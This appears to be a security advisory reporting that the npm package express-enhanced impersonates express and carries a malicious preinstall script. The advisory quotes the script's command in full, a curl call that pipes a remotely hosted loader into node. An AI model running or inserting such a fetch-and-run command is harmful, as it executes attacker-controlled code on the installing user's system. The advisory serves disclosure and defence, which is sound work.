Vulnerability MAL-2026-17489
Summary
Malicious code in express-enhanced (npm)
Details
[email protected] impersonates express (it copies express's package metadata, including the description "Fast, unopinionated, minimalist web framework" and author TJ Holowaychuk) and adds a preinstall script that runs on npm install and pipes a remotely hosted loader into node: curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js | node. This runs attacker-controlled JavaScript with the installing user's privileges. The npm account cleancomforter published express-enhanced and 8 similar packages on 2026-10-03 between 05:05 and 05:25 UTC, all with the same preinstall script.